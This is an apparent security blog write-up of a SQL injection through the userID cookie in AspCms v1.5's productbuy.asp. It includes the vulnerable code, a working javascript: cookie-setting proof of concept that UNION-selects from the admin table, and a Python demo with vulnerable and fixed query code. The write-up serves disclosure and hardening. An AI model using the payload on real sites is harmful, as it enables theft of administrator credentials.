
AspCms_v1.5_20110517 SQL Injection

Date: 2015/5/19 18:36:50 Author: 平凡之路 Source: xuhantao.com

A few days ago I came across a small site running AspCms. A quick search showed that productbuy.asp was known to have an injection, but the target had already patched it. I downloaded the code, and oddly enough, although the vendor had fixed the vulnerability reported online in productbuy.asp, I found another injection further down in the very same file.

Enough talk, here is the code:

 

<%
if action = "buy" then
    addOrder()
else
    echoContent()
end if

…… (omitted)

Sub echoContent()
    dim id
    id=getForm("id","get")

    ' the GET parameter id is validated as numeric before it reaches SQL (this is the patched part)
    if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"

    dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")
    dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
    Dim templatePath,tempStr
    templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"

    set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
    selectproduct=rsObj(0)

    Dim linkman,gender,phone,mobile,email,qq,address,postcode
    ' loginstatus is a plain cookie, so the client can set it to 1 itself
    if isnul(rCookie("loginstatus")) then wCookie "loginstatus",0
    if rCookie("loginstatus")=1 then
        ' userID is read from the cookie and concatenated straight into the query:
        ' no isnum() check, no quoting. This is the injection point.
        set rsObj=conn.Exec("select *from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
        ' every column read here is written into the page below, so the
        ' result of the injected query is visible in the response
        linkman=rsObj("truename")
        gender=rsObj("gender")
        phone=rsObj("phone")
        mobile=rsObj("mobile")
        email=rsObj("email")
        qq=rsObj("qq")
        address=rsObj("address")
        postcode=rsObj("postcode")
    else
        gender=1
    end if
    rsObj.close()

    with templateObj
        .content=loadFile(templatePath)
        .parseHtml()
        .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
        .content=replaceStr(.content,"[aspcms:linkman]",linkman)
        .content=replaceStr(.content,"[aspcms:gender]",gender)
        .content=replaceStr(.content,"[aspcms:phone]",phone)
        .content=replaceStr(.content,"[aspcms:mobile]",mobile)
        .content=replaceStr(.content,"[aspcms:email]",email)
        .content=replaceStr(.content,"[aspcms:qq]",qq)
        .content=replaceStr(.content,"[aspcms:address]",address)
        .content=replaceStr(.content,"[aspcms:postcode]",postcode)
        .parseCommon()
        echo .content
    end with
    set templateobj =nothing : terminateAllObjects
End Sub

The hole is obvious and needs little comment: the GET parameter id is gated by isnum(), but userID is taken from the cookie and concatenated into "select *from aspcms_Users where UserID=" with no numeric check and no quoting. The only precondition is the loginstatus=1 branch, and loginstatus is itself a cookie the client controls. Whatever the injected query returns in the truename, gender, phone, ... columns is substituted into the [aspcms:linkman], [aspcms:gender], [aspcms:phone], ... placeholders, so the result is echoed straight back in the page.

PoC (run from the browser address bar while on the target site, then request productbuy.asp with a valid id; the original had the typo documents.cookie, which would throw instead of setting anything):

javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));

The 22 values in the UNION must match the column count of aspcms_Users. Once the numbered placeholders show up in the form fields, replace the one that lands in the truename position (rendered as [aspcms:linkman]) with the admin-table column you want to read.
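To make the mechanics concrete, the following is an added example that is not from the page or from AspCms: a Python model of the loginstatus=1 branch, run against a constructed SQLite schema. The table aspcms_Users is cut down to three columns (the real one has 22, which is why the page's PoC pads its UNION with 22 values), the column names login_name and pwd_hash on Aspcms_Admins are made up, and is_num() is assumed to be the digits-only check that AspCms's isnum() applies to id. The vulnerable function reproduces the page's string concatenation; the hardened one applies the same isnum() gate to the cookie and binds the value, which is the fix a maintainer would want.

```python
import re
import sqlite3
from urllib.parse import quote

# Constructed stand-in schema. The real aspcms_Users table has 22 columns
# (the page's PoC pads its UNION with 22 values) and the real column names
# of Aspcms_Admins are not given on the page; three columns per table are
# enough to show the mechanics, and login_name / pwd_hash are made up here.
SCHEMA = """
CREATE TABLE aspcms_Users  (UserID INTEGER, truename TEXT, phone TEXT);
CREATE TABLE Aspcms_Admins (AdminID INTEGER, login_name TEXT, pwd_hash TEXT);
INSERT INTO aspcms_Users  VALUES (1, 'Zhang San', '13800000000');
INSERT INTO Aspcms_Admins VALUES (1, 'admin', 'e10adc3949ba59abbe56e057f20f883e');
"""


def open_db() -> sqlite3.Connection:
    """In-memory database loaded with the constructed sample rows above."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def is_num(value: str) -> bool:
    """Digits-only check, assumed to match what AspCms's isnum() enforces
    on the id parameter in echoContent()."""
    return re.fullmatch(r"[0-9]+", value) is not None


def vulnerable_user_query(user_id_cookie: str) -> str:
    """The query string echoContent() builds: trim the cookie, concatenate it."""
    return "select * from aspcms_Users where UserID=" + user_id_cookie.strip()


def fetch_profile_vulnerable(conn, user_id_cookie):
    """Behaves like the loginstatus=1 branch: runs the concatenated query and
    takes the first record, whose truename/phone end up in the template
    placeholders [aspcms:linkman] / [aspcms:phone]."""
    row = conn.execute(vulnerable_user_query(user_id_cookie)).fetchone()
    if row is None:
        return None
    return {"truename": row[1], "phone": row[2]}


def fetch_profile_hardened(conn, user_id_cookie):
    """Fix: apply the same isnum() gate the page already uses for id, and
    bind the value instead of concatenating it. Returns None where the
    original would call alertMsgAndGo."""
    value = user_id_cookie.strip()
    if not is_num(value):
        return None
    row = conn.execute(
        "select * from aspcms_Users where UserID=?", (int(value),)
    ).fetchone()
    if row is None:
        return None
    return {"truename": row[1], "phone": row[2]}


def poc_cookie_header(payload: str) -> str:
    """Cookie header equivalent to what the page's javascript: PoC sets:
    loginstatus=1 to enter the vulnerable branch, userID carrying the
    payload. quote() stands in for JavaScript's escape() here."""
    return "loginstatus=1; userID=" + quote(payload)


# UserID=0 does not exist, so the only record the page reads is the injected
# one; the column count (3) must match the constructed aspcms_Users table,
# just as the page's PoC uses 22 values for the real table.
ADMIN_PAYLOAD = "0 union select 1,login_name,pwd_hash from Aspcms_Admins"

if __name__ == "__main__":
    db = open_db()
    print("Cookie:", poc_cookie_header(ADMIN_PAYLOAD))
    print("vulnerable:", fetch_profile_vulnerable(db, ADMIN_PAYLOAD))
    print("hardened:  ", fetch_profile_hardened(db, ADMIN_PAYLOAD))
```

With the injected cookie the vulnerable path returns the admin row in the truename/phone slots, exactly where the page would print them as linkman and phone; the hardened path refuses the cookie before any SQL runs. Note that the isnum() gate alone would already stop this payload, but binding the value is what removes the bug class rather than this one string.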
